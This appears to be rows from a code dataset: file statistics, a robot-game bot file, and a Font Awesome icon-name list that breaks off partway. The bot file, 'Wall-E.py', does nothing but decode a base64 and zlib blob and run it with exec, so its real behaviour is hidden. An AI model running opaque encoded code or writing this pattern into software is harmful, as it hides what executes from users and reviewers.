| 51 | 101 | 0.686275 | 11 | 102 | 6.363636 | 0.545455 | 0.4 | 0.485714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078431 | 102 | 1 | 102 | 102 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0.656863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
1823bf0bd3c5c7af3f331add8e9200f69af48624 | 607 | py | Python | robogen/rgkit/backup bots/Wall-E.py | andrewgailey/robogen | 7e96cfa26d2e6dc383c5d205816ddd98f8f100d7 | [
"Unlicense"
] | null | null | null | robogen/rgkit/backup bots/Wall-E.py | andrewgailey/robogen | 7e96cfa26d2e6dc383c5d205816ddd98f8f100d7 | [
"Unlicense"
] | null | null | null | robogen/rgkit/backup bots/Wall-E.py | andrewgailey/robogen | 7e96cfa26d2e6dc383c5d205816ddd98f8f100d7 | [
"Unlicense"
] | null | null | null | import base64,zlib
exec zlib.decompress(base64.decodestring('eJxtks1u4yAUhfd5CrqYAiPbapdjxDzEbC0rwvyZBAMBnKhvX7DrVKpmxeVwzne5CLMEHzOIuonM\nCb+QG4UpsIeDJFLIcmb8CkmiA0yr4UZIOJJMo+6s5+nMol+dIBdq2TIJBq79Tun47A2XyJqU0RVj\nsh4O2yeZUUa2QdBPqeCthA0uFk3b95OQCsiS6BW9lIUsHRMCKUyizGt0A1z8vfjVeOKWpQT++cnn\n/gRqjvGMXONx2QJt/cQs0M1SNkYB39X4C9W9pntNFlpvgsv5vUixghJR1NXJWDbekXlz3DExWzE8\ngPIRPIBxYK7Q+/AYu2DZh4xnI15K9LkZMeF0rRcXlLf7yKpBt23SsOGUsVlG9HwX87oiixteDFPJ\nzG1ovy6vf72/UfpWXhbcavP99c/5I8hUWtR5q21qRc+oRGWtUwFpi1hBu7xVXwdJFimdDs+rORh/\nflvpUBHwX9fNYZP/x96D064dypN61ENsLhtsPFqFQw3f2g/2T/LBgnplUcAa2z8DYJ+IPdiH\n'))
| 202.333333 | 587 | 0.93575 | 32 | 607 | 17.75 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14262 | 0.00659 | 607 | 2 | 588 | 303.5 | 0.799337 | 0 | 0 | 0 | 0 | 0.5 | 0.892916 | 0.892916 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
43fa71cdef97b02c41bbe3853a35e38c809f92ac | 70,659 | py | Python | icons/names.py | DungeonMasterXLII/merit-api | 07e7e10d44ade9a1943009c7a183147fab4e96ef | [
"MIT"
] | null | null | null | icons/names.py | DungeonMasterXLII/merit-api | 07e7e10d44ade9a1943009c7a183147fab4e96ef | [
"MIT"
] | 1 | 2021-11-23T17:56:07.000Z | 2021-11-23T17:56:07.000Z | icons/names.py | DungeonMasterXLII/merit-api | 07e7e10d44ade9a1943009c7a183147fab4e96ef | [
"MIT"
] | 2 | 2022-03-03T15:43:50.000Z | 2022-03-31T15:08:29.000Z | FA_ICON_NAMES = [("fa500px","fa500px"),("faAbacus","faAbacus"),("faAccessibleIcon","faAccessibleIcon"),("faAccusoft","faAccusoft"),("faAcorn","faAcorn"),("faAcquisitionsIncorporated","faAcquisitionsIncorporated"),("faAd","faAd"),("faAddressBook","faAddressBook"),("faAddressCard","faAddressCard"),("faAdjust","faAdjust"),("faAdn","faAdn"),("faAdversal","faAdversal"),("faAffiliatetheme","faAffiliatetheme"),("faAirConditioner","faAirConditioner"),("faAirFreshener","faAirFreshener"),("faAirbnb","faAirbnb"),("faAlarmClock","faAlarmClock"),("faAlarmExclamation","faAlarmExclamation"),("faAlarmPlus","faAlarmPlus"),("faAlarmSnooze","faAlarmSnooze"),("faAlbum","faAlbum"),("faAlbumCollection","faAlbumCollection"),("faAlgolia","faAlgolia"),("faAlicorn","faAlicorn"),("faAlien","faAlien"),("faAlienMonster","faAlienMonster"),("faAlignCenter","faAlignCenter"),("faAlignJustify","faAlignJustify"),("faAlignLeft","faAlignLeft"),("faAlignRight","faAlignRight"),("faAlignSlash","faAlignSlash"),("faAlipay","faAlipay"),("faAllergies","faAllergies"),("faAmazon","faAmazon"),("faAmazonPay","faAmazonPay"),("faAmbulance","faAmbulance"),("faAmericanSignLanguageInterpreting","faAmericanSignLanguageInterpreting"),("faAmilia","faAmilia"),("faAmpGuitar","faAmpGuitar"),("faAnalytics","faAnalytics"),("faAnchor","faAnchor"),("faAndroid","faAndroid"),("faAngel","faAngel"),("faAngellist","faAngellist"),("faAngleDoubleDown","faAngleDoubleDown"),("faAngleDoubleLeft","faAngleDoubleLeft"),("faAngleDoubleRight","faAngleDoubleRight"),("faAngleDoubleUp","faAngleDoubleUp"),("faAngleDown","faAngleDown"),("faAngleLeft","faAngleLeft"),("faAngleRight","faAngleRight"),("faAngleUp","faAngleUp"),("faAngry","faAngry"),("faAngrycreative","faAngrycreative"),("faAngular","faAngular"),("faAnkh","faAnkh"),("faAppStore","faAppStore"),("faAppStoreIos","faAppStoreIos"),("faApper","faApper"),("faApple","faApple"),("faAppleAlt","faAppleAlt"),("faAppleCrate","faAppleCrate"),("faApplePay","faApplePay"),("faArchive","faArchive"),("faArchway","faArchway"),("faArrowAltCircleDown","faArrowAltCircleDown"),("faArrowAltCircleLeft","faArrowAltCircleLeft"),("faArrowAltCircleRight","faArrowAltCircleRight"),("faArrowAltCircleUp","faArrowAltCircleUp"),("faArrowAltDown","faArrowAltDown"),("faArrowAltFromBottom","faArrowAltFromBottom"),("faArrowAltFromLeft","faArrowAltFromLeft"),("faArrowAltFromRight","faArrowAltFromRight"),("faArrowAltFromTop","faArrowAltFromTop"),("faArrowAltLeft","faArrowAltLeft"),("faArrowAltRight","faArrowAltRight"),("faArrowAltSquareDown","faArrowAltSquareDown"),("faArrowAltSquareLeft","faArrowAltSquareLeft"),("faArrowAltSquareRight","faArrowAltSquareRight"),("faArrowAltSquareUp","faArrowAltSquareUp"),("faArrowAltToBottom","faArrowAltToBottom"),("faArrowAltToLeft","faArrowAltToLeft"),("faArrowAltToRight","faArrowAltToRight"),("faArrowAltToTop","faArrowAltToTop"),("faArrowAltUp","faArrowAltUp"),("faArrowCircleDown","faArrowCircleDown"),("faArrowCircleLeft","faArrowCircleLeft"),("faArrowCircleRight","faArrowCircleRight"),("faArrowCircleUp","faArrowCircleUp"),("faArrowDown","faArrowDown"),("faArrowFromBottom","faArrowFromBottom"),("faArrowFromLeft","faArrowFromLeft"),("faArrowFromRight","faArrowFromRight"),("faArrowFromTop","faArrowFromTop"),("faArrowLeft","faArrowLeft"),("faArrowRight","faArrowRight"),("faArrowSquareDown","faArrowSquareDown"),("faArrowSquareLeft","faArrowSquareLeft"),("faArrowSquareRight","faArrowSquareRight"),("faArrowSquareUp","faArrowSquareUp"),("faArrowToBottom","faArrowToBottom"),("faArrowToLeft","faArrowToLeft"),("faArrowToRight","faArrowToRight"),("faArrowToTop","faArrowToTop"),("faArrowUp","faArrowUp"),("faArrows","faArrows"),("faArrowsAlt","faArrowsAlt"),("faArrowsAltH","faArrowsAltH"),("faArrowsAltV","faArrowsAltV"),("faArrowsH","faArrowsH"),("faArrowsV","faArrowsV"),("faArtstation","faArtstation"),("faAssistiveListeningSystems","faAssistiveListeningSystems"),("faAsterisk","faAsterisk"),("faAsymmetrik","faAsymmetrik"),("faAt","faAt"),("faAtlas","faAtlas"),("faAtlassian","faAtlassian"),("faAtom","faAtom"),("faAtomAlt","faAtomAlt"),("faAudible","faAudible"),("faAudioDescription","faAudioDescription"),("faAutoprefixer","faAutoprefixer"),("faAvianex","faAvianex"),("faAviato","faAviato"),("faAward","faAward"),("faAws","faAws"),("faAxe","faAxe"),("faAxeBattle","faAxeBattle"),("faBaby","faBaby"),("faBabyCarriage","faBabyCarriage"),("faBackpack","faBackpack"),("faBackspace","faBackspace"),("faBackward","faBackward"),("faBacon","faBacon"),("faBacteria","faBacteria"),("faBacterium","faBacterium"),("faBadge","faBadge"),("faBadgeCheck","faBadgeCheck"),("faBadgeDollar","faBadgeDollar"),("faBadgePercent","faBadgePercent"),("faBadgeSheriff","faBadgeSheriff"),("faBadgerHoney","faBadgerHoney"),("faBagsShopping","faBagsShopping"),("faBahai","faBahai"),("faBalanceScale","faBalanceScale"),("faBalanceScaleLeft","faBalanceScaleLeft"),("faBalanceScaleRight","faBalanceScaleRight"),("faBallPile","faBallPile"),("faBallot","faBallot"),("faBallotCheck","faBallotCheck"),("faBan","faBan"),("faBandAid","faBandAid"),("faBandcamp","faBandcamp"),("faBanjo","faBanjo"),("faBarcode","faBarcode"),("faBarcodeAlt","faBarcodeAlt"),("faBarcodeRead","faBarcodeRead"),("faBarcodeScan","faBarcodeScan"),("faBars","faBars"),("faBaseball","faBaseball"),("faBaseballBall","faBaseballBall"),("faBasketballBall","faBasketballBall"),("faBasketballHoop","faBasketballHoop"),("faBat","faBat"),("faBath","faBath"),("faBatteryBolt","faBatteryBolt"),("faBatteryEmpty","faBatteryEmpty"),("faBatteryFull","faBatteryFull"),("faBatteryHalf","faBatteryHalf"),("faBatteryQuarter","faBatteryQuarter"),("faBatterySlash","faBatterySlash"),("faBatteryThreeQuarters","faBatteryThreeQuarters"),("faBattleNet","faBattleNet"),("faBed","faBed"),("faBedAlt","faBedAlt"),("faBedBunk","faBedBunk"),("faBedEmpty","faBedEmpty"),("faBeer","faBeer"),("faBehance","faBehance"),("faBehanceSquare","faBehanceSquare"),("faBell","faBell"),("faBellExclamation","faBellExclamation"),("faBellOn","faBellOn"),("faBellPlus","faBellPlus"),("faBellSchool","faBellSchool"),("faBellSchoolSlash","faBellSchoolSlash"),("faBellSlash","faBellSlash"),("faBells","faBells"),("faBetamax","faBetamax"),("faBezierCurve","faBezierCurve"),("faBible","faBible"),("faBicycle","faBicycle"),("faBiking","faBiking"),("faBikingMountain","faBikingMountain"),("faBimobject","faBimobject"),("faBinoculars","faBinoculars"),("faBiohazard","faBiohazard"),("faBirthdayCake","faBirthdayCake"),("faBitbucket","faBitbucket"),("faBitcoin","faBitcoin"),("faBity","faBity"),("faBlackTie","faBlackTie"),("faBlackberry","faBlackberry"),("faBlanket","faBlanket"),("faBlender","faBlender"),("faBlenderPhone","faBlenderPhone"),("faBlind","faBlind"),("faBlinds","faBlinds"),("faBlindsOpen","faBlindsOpen"),("faBlindsRaised","faBlindsRaised"),("faBlog","faBlog"),("faBlogger","faBlogger"),("faBloggerB","faBloggerB"),("faBluetooth","faBluetooth"),("faBluetoothB","faBluetoothB"),("faBold","faBold"),("faBolt","faBolt"),("faBomb","faBomb"),("faBone","faBone"),("faBoneBreak","faBoneBreak"),("faBong","faBong"),("faBook","faBook"),("faBookAlt","faBookAlt"),("faBookDead","faBookDead"),("faBookHeart","faBookHeart"),("faBookMedical","faBookMedical"),("faBookOpen","faBookOpen"),("faBookReader","faBookReader"),("faBookSpells","faBookSpells"),("faBookUser","faBookUser"),("faBookmark","faBookmark"),("faBooks","faBooks"),("faBooksMedical","faBooksMedical"),("faBoombox","faBoombox"),("faBoot","faBoot"),("faBoothCurtain","faBoothCurtain"),("faBootstrap","faBootstrap"),("faBorderAll","faBorderAll"),("faBorderBottom","faBorderBottom"),("faBorderCenterH","faBorderCenterH"),("faBorderCenterV","faBorderCenterV"),("faBorderInner","faBorderInner"),("faBorderLeft","faBorderLeft"),("faBorderNone","faBorderNone"),("faBorderOuter","faBorderOuter"),("faBorderRight","faBorderRight"),("faBorderStyle","faBorderStyle"),("faBorderStyleAlt","faBorderStyleAlt"),("faBorderTop","faBorderTop"),("faBowArrow","faBowArrow"),("faBowlingBall","faBowlingBall"),("faBowlingPins","faBowlingPins"),("faBox","faBox"),("faBoxAlt","faBoxAlt"),("faBoxBallot","faBoxBallot"),("faBoxCheck","faBoxCheck"),("faBoxFragile","faBoxFragile"),("faBoxFull","faBoxFull"),("faBoxHeart","faBoxHeart"),("faBoxOpen","faBoxOpen"),("faBoxTissue","faBoxTissue"),("faBoxUp","faBoxUp"),("faBoxUsd","faBoxUsd"),("faBoxes","faBoxes"),("faBoxesAlt","faBoxesAlt"),("faBoxingGlove","faBoxingGlove"),("faBrackets","faBrackets"),("faBracketsCurly","faBracketsCurly"),("faBraille","faBraille"),("faBrain","faBrain"),("faBreadLoaf","faBreadLoaf"),("faBreadSlice","faBreadSlice"),("faBriefcase","faBriefcase"),("faBriefcaseMedical","faBriefcaseMedical"),("faBringForward","faBringForward"),("faBringFront","faBringFront"),("faBroadcastTower","faBroadcastTower"),("faBroom","faBroom"),("faBrowser","faBrowser"),("faBrush","faBrush"),("faBtc","faBtc"),("faBuffer","faBuffer"),("faBug","faBug"),("faBuilding","faBuilding"),("faBullhorn","faBullhorn"),("faBullseye","faBullseye"),("faBullseyeArrow","faBullseyeArrow"),("faBullseyePointer","faBullseyePointer"),("faBurgerSoda","faBurgerSoda"),("faBurn","faBurn"),("faBuromobelexperte","faBuromobelexperte"),("faBurrito","faBurrito"),("faBus","faBus"),("faBusAlt","faBusAlt"),("faBusSchool","faBusSchool"),("faBusinessTime","faBusinessTime"),("faBuyNLarge","faBuyNLarge"),("faBuysellads","faBuysellads"),("faCabinetFiling","faCabinetFiling"),("faCactus","faCactus"),("faCalculator","faCalculator"),("faCalculatorAlt","faCalculatorAlt"),("faCalendar","faCalendar"),("faCalendarAlt","faCalendarAlt"),("faCalendarCheck","faCalendarCheck"),("faCalendarDay","faCalendarDay"),("faCalendarEdit","faCalendarEdit"),("faCalendarExclamation","faCalendarExclamation"),("faCalendarMinus","faCalendarMinus"),("faCalendarPlus","faCalendarPlus"),("faCalendarStar","faCalendarStar"),("faCalendarTimes","faCalendarTimes"),("faCalendarWeek","faCalendarWeek"),("faCamcorder","faCamcorder"),("faCamera","faCamera"),("faCameraAlt","faCameraAlt"),("faCameraHome","faCameraHome"),("faCameraMovie","faCameraMovie"),("faCameraPolaroid","faCameraPolaroid"),("faCameraRetro","faCameraRetro"),("faCampfire","faCampfire"),("faCampground","faCampground"),("faCanadianMapleLeaf","faCanadianMapleLeaf"),("faCandleHolder","faCandleHolder"),("faCandyCane","faCandyCane"),("faCandyCorn","faCandyCorn"),("faCannabis","faCannabis"),("faCapsules","faCapsules"),("faCar","faCar"),("faCarAlt","faCarAlt"),("faCarBattery","faCarBattery"),("faCarBuilding","faCarBuilding"),("faCarBump","faCarBump"),("faCarBus","faCarBus"),("faCarCrash","faCarCrash"),("faCarGarage","faCarGarage"),("faCarMechanic","faCarMechanic"),("faCarSide","faCarSide"),("faCarTilt","faCarTilt"),("faCarWash","faCarWash"),("faCaravan","faCaravan"),("faCaravanAlt","faCaravanAlt"),("faCaretCircleDown","faCaretCircleDown"),("faCaretCircleLeft","faCaretCircleLeft"),("faCaretCircleRight","faCaretCircleRight"),("faCaretCircleUp","faCaretCircleUp"),("faCaretDown","faCaretDown"),("faCaretLeft","faCaretLeft"),("faCaretRight","faCaretRight"),("faCaretSquareDown","faCaretSquareDown"),("faCaretSquareLeft","faCaretSquareLeft"),("faCaretSquareRight","faCaretSquareRight"),("faCaretSquareUp","faCaretSquareUp"),("faCaretUp","faCaretUp"),("faCarrot","faCarrot"),("faCars","faCars"),("faCartArrowDown","faCartArrowDown"),("faCartPlus","faCartPlus"),("faCashRegister","faCashRegister"),("faCassetteTape","faCassetteTape"),("faCat","faCat"),("faCatSpace","faCatSpace"),("faCauldron","faCauldron"),("faCcAmazonPay","faCcAmazonPay"),("faCcAmex","faCcAmex"),("faCcApplePay","faCcApplePay"),("faCcDinersClub","faCcDinersClub"),("faCcDiscover","faCcDiscover"),("faCcJcb","faCcJcb"),("faCcMastercard","faCcMastercard"),("faCcPaypal","faCcPaypal"),("faCcStripe","faCcStripe"),("faCcVisa","faCcVisa"),("faCctv","faCctv"),("faCentercode","faCentercode"),("faCentos","faCentos"),("faCertificate","faCertificate"),("faChair","faChair"),("faChairOffice","faChairOffice"),("faChalkboard","faChalkboard"),("faChalkboardTeacher","faChalkboardTeacher"),("faChargingStation","faChargingStation"),("faChartArea","faChartArea"),("faChartBar","faChartBar"),("faChartLine","faChartLine"),("faChartLineDown","faChartLineDown"),("faChartNetwork","faChartNetwork"),("faChartPie","faChartPie"),("faChartPieAlt","faChartPieAlt"),("faChartScatter","faChartScatter"),("faCheck","faCheck"),("faCheckCircle","faCheckCircle"),("faCheckDouble","faCheckDouble"),("faCheckSquare","faCheckSquare"),("faCheese","faCheese"),("faCheeseSwiss","faCheeseSwiss"),("faCheeseburger","faCheeseburger"),("faChess","faChess"),("faChessBishop","faChessBishop"),("faChessBishopAlt","faChessBishopAlt"),("faChessBoard","faChessBoard"),("faChessClock","faChessClock"),("faChessClockAlt","faChessClockAlt"),("faChessKing","faChessKing"),("faChessKingAlt","faChessKingAlt"),("faChessKnight","faChessKnight"),("faChessKnightAlt","faChessKnightAlt"),("faChessPawn","faChessPawn"),("faChessPawnAlt","faChessPawnAlt"),("faChessQueen","faChessQueen"),("faChessQueenAlt","faChessQueenAlt"),("faChessRook","faChessRook"),("faChessRookAlt","faChessRookAlt"),("faChevronCircleDown","faChevronCircleDown"),("faChevronCircleLeft","faChevronCircleLeft"),("faChevronCircleRight","faChevronCircleRight"),("faChevronCircleUp","faChevronCircleUp"),("faChevronDoubleDown","faChevronDoubleDown"),("faChevronDoubleLeft","faChevronDoubleLeft"),("faChevronDoubleRight","faChevronDoubleRight"),("faChevronDoubleUp","faChevronDoubleUp"),("faChevronDown","faChevronDown"),("faChevronLeft","faChevronLeft"),("faChevronRight","faChevronRight"),("faChevronSquareDown","faChevronSquareDown"),("faChevronSquareLeft","faChevronSquareLeft"),("faChevronSquareRight","faChevronSquareRight"),("faChevronSquareUp","faChevronSquareUp"),("faChevronUp","faChevronUp"),("faChild","faChild"),("faChimney","faChimney"),("faChrome","faChrome"),("faChromecast","faChromecast"),("faChurch","faChurch"),("faCircle","faCircle"),("faCircleNotch","faCircleNotch"),("faCity","faCity"),("faClarinet","faClarinet"),("faClawMarks","faClawMarks"),("faClinicMedical","faClinicMedical"),("faClipboard","faClipboard"),("faClipboardCheck","faClipboardCheck"),("faClipboardList","faClipboardList"),("faClipboardListCheck","faClipboardListCheck"),("faClipboardPrescription","faClipboardPrescription"),("faClipboardUser","faClipboardUser"),("faClock","faClock"),("faClone","faClone"),("faClosedCaptioning","faClosedCaptioning"),("faCloud","faCloud"),("faCloudDownload","faCloudDownload"),("faCloudDownloadAlt","faCloudDownloadAlt"),("faCloudDrizzle","faCloudDrizzle"),("faCloudHail","faCloudHail"),("faCloudHailMixed","faCloudHailMixed"),("faCloudMeatball","faCloudMeatball"),("faCloudMoon","faCloudMoon"),("faCloudMoonRain","faCloudMoonRain"),("faCloudMusic","faCloudMusic"),("faCloudRain","faCloudRain"),("faCloudRainbow","faCloudRainbow"),("faCloudShowers","faCloudShowers"),("faCloudShowersHeavy","faCloudShowersHeavy"),("faCloudSleet","faCloudSleet"),("faCloudSnow","faCloudSnow"),("faCloudSun","faCloudSun"),("faCloudSunRain","faCloudSunRain"),("faCloudUpload","faCloudUpload"),("faCloudUploadAlt","faCloudUploadAlt"),("faCloudflare","faCloudflare"),("faClouds","faClouds"),("faCloudsMoon","faCloudsMoon"),("faCloudsSun","faCloudsSun"),("faCloudscale","faCloudscale"),("faCloudsmith","faCloudsmith"),("faCloudversify","faCloudversify"),("faClub","faClub"),("faCocktail","faCocktail"),("faCode","faCode"),("faCodeBranch","faCodeBranch"),("faCodeCommit","faCodeCommit"),("faCodeMerge","faCodeMerge"),("faCodepen","faCodepen"),("faCodiepie","faCodiepie"),("faCoffee","faCoffee"),("faCoffeePot","faCoffeePot"),("faCoffeeTogo","faCoffeeTogo"),("faCoffin","faCoffin"),("faCoffinCross","faCoffinCross"),("faCog","faCog"),("faCogs","faCogs"),("faCoin","faCoin"),("faCoins","faCoins"),("faColumns","faColumns"),("faComet","faComet"),("faComment","faComment"),("faCommentAlt","faCommentAlt"),("faCommentAltCheck","faCommentAltCheck"),("faCommentAltDollar","faCommentAltDollar"),("faCommentAltDots","faCommentAltDots"),("faCommentAltEdit","faCommentAltEdit"),("faCommentAltExclamation","faCommentAltExclamation"),("faCommentAltLines","faCommentAltLines"),("faCommentAltMedical","faCommentAltMedical"),("faCommentAltMinus","faCommentAltMinus"),("faCommentAltMusic","faCommentAltMusic"),("faCommentAltPlus","faCommentAltPlus"),("faCommentAltSlash","faCommentAltSlash"),("faCommentAltSmile","faCommentAltSmile"),("faCommentAltTimes","faCommentAltTimes"),("faCommentCheck","faCommentCheck"),("faCommentDollar","faCommentDollar"),("faCommentDots","faCommentDots"),("faCommentEdit","faCommentEdit"),("faCommentExclamation","faCommentExclamation"),("faCommentLines","faCommentLines"),("faCommentMedical","faCommentMedical"),("faCommentMinus","faCommentMinus"),("faCommentMusic","faCommentMusic"),("faCommentPlus","faCommentPlus"),("faCommentSlash","faCommentSlash"),("faCommentSmile","faCommentSmile"),("faCommentTimes","faCommentTimes"),("faComments","faComments"),("faCommentsAlt","faCommentsAlt"),("faCommentsAltDollar","faCommentsAltDollar"),("faCommentsDollar","faCommentsDollar"),("faCompactDisc","faCompactDisc"),("faCompass","faCompass"),("faCompassSlash","faCompassSlash"),("faCompress","faCompress"),("faCompressAlt","faCompressAlt"),("faCompressArrowsAlt","faCompressArrowsAlt"),("faCompressWide","faCompressWide"),("faComputerClassic","faComputerClassic"),("faComputerSpeaker","faComputerSpeaker"),("faConciergeBell","faConciergeBell"),("faConfluence","faConfluence"),("faConnectdevelop","faConnectdevelop"),("faConstruction","faConstruction"),("faContainerStorage","faContainerStorage"),("faContao","faContao"),("faConveyorBelt","faConveyorBelt"),("faConveyorBeltAlt","faConveyorBeltAlt"),("faCookie","faCookie"),("faCookieBite","faCookieBite"),("faCopy","faCopy"),("faCopyright","faCopyright"),("faCorn","faCorn"),("faCottonBureau","faCottonBureau"),("faCouch","faCouch"),("faCow","faCow"),("faCowbell","faCowbell"),("faCowbellMore","faCowbellMore"),("faCpanel","faCpanel"),("faCreativeCommons","faCreativeCommons"),("faCreativeCommonsBy","faCreativeCommonsBy"),("faCreativeCommonsNc","faCreativeCommonsNc"),("faCreativeCommonsNcEu","faCreativeCommonsNcEu"),("faCreativeCommonsNcJp","faCreativeCommonsNcJp"),("faCreativeCommonsNd","faCreativeCommonsNd"),("faCreativeCommonsPd","faCreativeCommonsPd"),("faCreativeCommonsPdAlt","faCreativeCommonsPdAlt"),("faCreativeCommonsRemix","faCreativeCommonsRemix"),("faCreativeCommonsSa","faCreativeCommonsSa"),("faCreativeCommonsSampling","faCreativeCommonsSampling"),("faCreativeCommonsSamplingPlus","faCreativeCommonsSamplingPlus"),("faCreativeCommonsShare","faCreativeCommonsShare"),("faCreativeCommonsZero","faCreativeCommonsZero"),("faCreditCard","faCreditCard"),("faCreditCardBlank","faCreditCardBlank"),("faCreditCardFront","faCreditCardFront"),("faCricket","faCricket"),("faCriticalRole","faCriticalRole"),("faCroissant","faCroissant"),("faCrop","faCrop"),("faCropAlt","faCropAlt"),("faCross","faCross"),("faCrosshairs","faCrosshairs"),("faCrow","faCrow"),("faCrown","faCrown"),("faCrutch","faCrutch"),("faCrutches","faCrutches"),("faCss3","faCss3"),("faCss3Alt","faCss3Alt"),("faCube","faCube"),("faCubes","faCubes"),("faCurling","faCurling"),("faCut","faCut"),("faCuttlefish","faCuttlefish"),("faDAndD","faDAndD"),("faDAndDBeyond","faDAndDBeyond"),("faDagger","faDagger"),("faDailymotion","faDailymotion"),("faDashcube","faDashcube"),("faDatabase","faDatabase"),("faDeaf","faDeaf"),("faDebug","faDebug"),("faDeer","faDeer"),("faDeerRudolph","faDeerRudolph"),("faDeezer","faDeezer"),("faDelicious","faDelicious"),("faDemocrat","faDemocrat"),("faDeploydog","faDeploydog"),("faDeskpro","faDeskpro"),("faDesktop","faDesktop"),("faDesktopAlt","faDesktopAlt"),("faDev","faDev"),("faDeviantart","faDeviantart"),("faDewpoint","faDewpoint"),("faDharmachakra","faDharmachakra"),("faDhl","faDhl"),("faDiagnoses","faDiagnoses"),("faDiamond","faDiamond"),("faDiaspora","faDiaspora"),("faDice","faDice"),("faDiceD10","faDiceD10"),("faDiceD12","faDiceD12"),("faDiceD20","faDiceD20"),("faDiceD4","faDiceD4"),("faDiceD6","faDiceD6"),("faDiceD8","faDiceD8"),("faDiceFive","faDiceFive"),("faDiceFour","faDiceFour"),("faDiceOne","faDiceOne"),("faDiceSix","faDiceSix"),("faDiceThree","faDiceThree"),("faDiceTwo","faDiceTwo"),("faDigg","faDigg"),("faDigging","faDigging"),("faDigitalOcean","faDigitalOcean"),("faDigitalTachograph","faDigitalTachograph"),("faDiploma","faDiploma"),("faDirections","faDirections"),("faDiscDrive","faDiscDrive"),("faDiscord","faDiscord"),("faDiscourse","faDiscourse"),("faDisease","faDisease"),("faDivide","faDivide"),("faDizzy","faDizzy"),("faDna","faDna"),("faDoNotEnter","faDoNotEnter"),("faDochub","faDochub"),("faDocker","faDocker"),("faDog","faDog"),("faDogLeashed","faDogLeashed"),("faDollarSign","faDollarSign"),("faDolly","faDolly"),("faDollyEmpty","faDollyEmpty"),("faDollyFlatbed","faDollyFlatbed"),("faDollyFlatbedAlt","faDollyFlatbedAlt"),("faDollyFlatbedEmpty","faDollyFlatbedEmpty"),("faDonate","faDonate"),("faDoorClosed","faDoorClosed"),("faDoorOpen","faDoorOpen"),("faDotCircle","faDotCircle"),("faDove","faDove"),("faDownload","faDownload"),("faDraft2digital","faDraft2digital"),("faDraftingCompass","faDraftingCompass"),("faDragon","faDragon"),("faDrawCircle","faDrawCircle"),("faDrawPolygon","faDrawPolygon"),("faDrawSquare","faDrawSquare"),("faDreidel","faDreidel"),("faDribbble","faDribbble"),("faDribbbleSquare","faDribbbleSquare"),("faDrone","faDrone"),("faDroneAlt","faDroneAlt"),("faDropbox","faDropbox"),("faDrum","faDrum"),("faDrumSteelpan","faDrumSteelpan"),("faDrumstick","faDrumstick"),("faDrumstickBite","faDrumstickBite"),("faDrupal","faDrupal"),("faDryer","faDryer"),("faDryerAlt","faDryerAlt"),("faDuck","faDuck"),("faDumbbell","faDumbbell"),("faDumpster","faDumpster"),("faDumpsterFire","faDumpsterFire"),("faDungeon","faDungeon"),("faDyalog","faDyalog"),("faEar","faEar"),("faEarMuffs","faEarMuffs"),("faEarlybirds","faEarlybirds"),("faEbay","faEbay"),("faEclipse","faEclipse"),("faEclipseAlt","faEclipseAlt"),("faEdge","faEdge"),("faEdgeLegacy","faEdgeLegacy"),("faEdit","faEdit"),("faEgg","faEgg"),("faEggFried","faEggFried"),("faEject","faEject"),("faElementor","faElementor"),("faElephant","faElephant"),("faEllipsisH","faEllipsisH"),("faEllipsisHAlt","faEllipsisHAlt"),("faEllipsisV","faEllipsisV"),("faEllipsisVAlt","faEllipsisVAlt"),("faEllo","faEllo"),("faEmber","faEmber"),("faEmpire","faEmpire"),("faEmptySet","faEmptySet"),("faEngineWarning","faEngineWarning"),("faEnvelope","faEnvelope"),("faEnvelopeOpen","faEnvelopeOpen"),("faEnvelopeOpenDollar","faEnvelopeOpenDollar"),("faEnvelopeOpenText","faEnvelopeOpenText"),("faEnvelopeSquare","faEnvelopeSquare"),("faEnvira","faEnvira"),("faEquals","faEquals"),("faEraser","faEraser"),("faErlang","faErlang"),("faEthereum","faEthereum"),("faEthernet","faEthernet"),("faEtsy","faEtsy"),("faEuroSign","faEuroSign"),("faEvernote","faEvernote"),("faExchange","faExchange"),("faExchangeAlt","faExchangeAlt"),("faExclamation","faExclamation"),("faExclamationCircle","faExclamationCircle"),("faExclamationSquare","faExclamationSquare"),("faExclamationTriangle","faExclamationTriangle"),("faExpand","faExpand"),("faExpandAlt","faExpandAlt"),("faExpandArrows","faExpandArrows"),("faExpandArrowsAlt","faExpandArrowsAlt"),("faExpandWide","faExpandWide"),("faExpeditedssl","faExpeditedssl"),("faExternalLink","faExternalLink"),("faExternalLinkAlt","faExternalLinkAlt"),("faExternalLinkSquare","faExternalLinkSquare"),("faExternalLinkSquareAlt","faExternalLinkSquareAlt"),("faEye","faEye"),("faEyeDropper","faEyeDropper"),("faEyeEvil","faEyeEvil"),("faEyeSlash","faEyeSlash"),("faFacebook","faFacebook"),("faFacebookF","faFacebookF"),("faFacebookMessenger","faFacebookMessenger"),("faFacebookSquare","faFacebookSquare"),("faFan","faFan"),("faFanTable","faFanTable"),("faFantasyFlightGames","faFantasyFlightGames"),("faFarm","faFarm"),("faFastBackward","faFastBackward"),("faFastForward","faFastForward"),("faFaucet","faFaucet"),("faFaucetDrip","faFaucetDrip"),("faFax","faFax"),("faFeather","faFeather"),("faFeatherAlt","faFeatherAlt"),("faFedex","faFedex"),("faFedora","faFedora"),("faFemale","faFemale"),("faFieldHockey","faFieldHockey"),("faFighterJet","faFighterJet"),("faFigma","faFigma"),("faFile","faFile"),("faFileAlt","faFileAlt"),("faFileArchive","faFileArchive"),("faFileAudio","faFileAudio"),("faFileCertificate","faFileCertificate"),("faFileChartLine","faFileChartLine"),("faFileChartPie","faFileChartPie"),("faFileCheck","faFileC